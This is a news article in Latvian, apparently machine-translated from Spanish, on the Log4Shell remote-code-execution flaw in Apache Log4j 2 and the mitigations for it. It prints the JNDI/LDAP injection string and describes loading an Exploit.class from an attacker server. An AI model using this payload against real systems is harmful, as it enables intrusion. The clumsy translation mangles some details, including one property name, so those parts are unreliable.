Log4Shell, kritiska Apache Log4j 2 ievainojamība, kas ietekmē daudzus Java projektus

Nesen se izlaida ziņas, ka Apache Log4j 2 tika konstatēta kritiska ievainojamība, kas tiek raksturots kā populārs ietvars reģistra organizēšanai Java lietojumprogrammās, kas ļauj izpildīt patvaļīgu kodu, kad reģistrā tiek ierakstīta īpaši formatēta vērtība formātā "{jndi: URL}".

Neaizsargātība Tas ir ievērojams, jo uzbrukumu var veikt Java lietojumprogrammās, kasTie ieraksta vērtības, kas iegūtas no ārējiem avotiem, piemēram, parādot problemātiskas vērtības kļūdu ziņojumos.

Tiek novērots, ka tiek ietekmēti gandrīz visi projekti, kas izmanto tādus ietvarus kā Apache Struts, Apache Solr, Apache Druid vai Apache Flink, tostarp Steam, Apple iCloud, Minecraft klienti un serveri.

Paredzams, ka ievainojamība izraisīs masveida uzbrukumu vilni uzņēmumu lietojumprogrammām, atkārtojot kritisko ievainojamību vēsturi Apache Struts sistēmā, kas ir aptuvens aprēķins, kas tiek izmantots 65% Fortune 100 tīmekļa lietojumprogrammu. Uzņēmuma tīmekļa lietojumprogrammu saraksts ietvēra jau reģistrētos mēģinājumus skenēt tīklu, lai atrastu neaizsargātas sistēmas.

Ievainojamība ļauj attālināti izpildīt neautentificētu kodu. Log4j 2 ir atvērtā pirmkoda Java žurnālu bibliotēka, ko izstrādājis Apache Foundation. Log4j 2 tiek plaši izmantots daudzās lietojumprogrammās, un tas ir kā atkarība daudzos pakalpojumos. Tie ietver biznesa lietojumprogrammas, kā arī daudzus mākoņpakalpojumus.

Randori uzbrukuma komanda ir izstrādājusi funkcionālu izmantošanu un ir spējusi veiksmīgi izmantot šo ievainojamību klientu vidē kā daļu no mūsu aizskarošās drošības platformas. 

Ievainojamībai var piekļūt, izmantojot daudzas lietojumprogrammai specifiskas metodes. Patiešām, jebkurš scenārijs, kas ļauj attālam savienojumam piegādāt patvaļīgus datus, ko lietojumprogramma, kas izmanto log4j bibliotēku, ieraksta žurnālfailos, ir pakļauta ekspluatācijai. Šī ievainojamība, visticamāk, tiks izmantota savvaļā, un tā var ietekmēt tūkstošiem organizāciju. Šī ievainojamība rada būtisku reālu risku ietekmētajām sistēmām.

Problēmu pastiprina fakts, ka jau ir publicēts funkcionāls izmantojums, piem.Bet stabilu filiāļu labojumi vēl nav ģenerēti. CVE identifikators vēl nav piešķirts. Risinājums ir iekļauts tikai log4j-2.15.0-rc1 testa filiālē. Lai bloķētu ievainojamību, ieteicams parametram Log4j2.formatMsgNoLookups iestatīt vērtību True.

Problēma tas bija saistīts ar faktu, ka Log4j 2 atbalsta speciālo masku apstrādi «{}» žurnālu rindās, kurā Var palaist JNDI vaicājumus (Java nosaukumu un direktoriju saskarne).

Analizējot CVE-2021-44228, Randori ir noteicis tālāk norādīto.

Plaši izmantotās biznesa programmatūras noklusējuma instalācijas ir neaizsargātas.
Ievainojamību var izmantot uzticami un bez autentifikācijas.
Ievainojamība ietekmē vairākas Log4j 2 versijas.
Ievainojamība ļauj attālināti izpildīt kodu, kad lietotājs palaiž lietojumprogrammu, izmantojot bibliotēku.

Uzbrukums ir saistīts ar virknes nodošanu ar aizstāšanu "$ {jndi: ldap: //example.com/a}", kuru apstrādājot Log4j 2 nosūtīs LDAP pieprasījumu par ceļu uz Java klasi uz attacker.com serveri. . Uzbrucēja servera atgrieztais ceļš (piemēram, http://example.com/Exploit.class) tiks ielādēts un izpildīts pašreizējā procesa kontekstā, ļaujot uzbrucējam ar tiesībām panākt patvaļīgu koda izpildi sistēmā. pašreizējā pieteikuma.

Visbeidzot, tas ir minēts ja tiek konstatētas novirzes, ieteicams pieņemt, ka tas ir aktīvs incidents, ka tas ir apdraudēts, un attiecīgi reaģēt. Jauninot uz Log4j 2 vai ietekmētajām lietojumprogrammām labotajām versijām, šī ievainojamība tiks novērsta. Randori iesaka jebkurai organizācijai, kuru tā uzskata par ietekmētu, steidzami jaunināt uz labotu versiju.

Apache Log4j komandas jaunākajā atjauninājumā iesaka organizācijām rīkoties šādi

  • Atjaunināt uz Log4j 2.15.0
  • Tiem, kuri nevar jaunināt uz 2.15.0: versijās> = 2.10 šo ievainojamību var mazināt, iestatot sistēmas rekvizītu log4j2.formatMsgNoLookup vai vides mainīgo LOG4J_FORMAT_MSG_NO_LOOKUPS uz True.
  • Versijām 2,0-beta9 līdz 2.10.0 mazināšana ir JndiLookup klases noņemšana no klases ceļa: zip -q -d log4j-core - *. Jar org / apache / logging / log4j / core / lookup /JndiLookup.class.

Fuente: https://www.lunasec.io/


Esi pirmais, kas komentārus

Atstājiet savu komentāru

Jūsu e-pasta adrese netiks publicēta. Obligātie lauki ir atzīmēti ar *

*

*

  1. Atbildīgais par datiem: Migels Ángels Gatóns
  2. Datu mērķis: SPAM kontrole, komentāru pārvaldība.
  3. Legitimācija: jūsu piekrišana
  4. Datu paziņošana: Dati netiks paziņoti trešām personām, izņemot juridiskus pienākumus.
  5. Datu glabāšana: datu bāze, ko mitina Occentus Networks (ES)
  6. Tiesības: jebkurā laikā varat ierobežot, atjaunot un dzēst savu informāciju.